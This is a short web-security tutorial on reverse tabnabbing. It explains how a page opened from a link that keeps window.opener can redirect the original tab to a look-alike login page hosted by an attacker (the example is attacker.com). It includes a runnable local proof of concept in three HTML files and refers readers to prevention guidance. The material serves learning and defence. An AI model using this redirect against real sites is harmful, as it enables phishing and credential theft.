In a situation where an attacker can control the
href argument of an
<a tag with the attribute
A regular way to abuse this behavior would be to change the location of the original web via
window.opener.location = https://attacker.com/victim.html to a web controlled by the attacker that looks like the original one, so it can imitate the login form of the original website and ask for credentials to the user.
Link between parent and child pages when prevention attribute is not used:
Link between parent and child pages when prevention attribute is used:
Create the following pages in a folder and run a web server with
python3 -m http.server
http://127.0.0.1:8000/vulnerable.html, click on the link and note how the original website URL changes.
vulnerable.html<!DOCTYPE html><html><body><h1>Victim Site</h1><a href="http://127.0.0.1:8000/malicious.html" target="_blank" rel="opener">Controlled by the attacker</a></body></html>
malicious.html<!DOCTYPE html><html><body><script>window.opener.location = "http://127.0.0.1:8000/malicious_redir.html";</script></body></html>
malicious_redir.html<!DOCTYPE html><html><body><h1>New Malicious Site</h1></body></html>
opener.closed: Returns a boolean value indicating whether a window has been closed or not.
opener.frames: Returns all iframe elements in the current window.
opener.length: Returns the number of iframe elements in the current window.
opener.opener: Returns a reference to the window that created the window.
opener.parent: Returns the parent window of the current window.
opener.self: Returns the current window.
opener.top: Returns the topmost browser window.
Prevention information are documented into the HTML5 Cheat Sheet.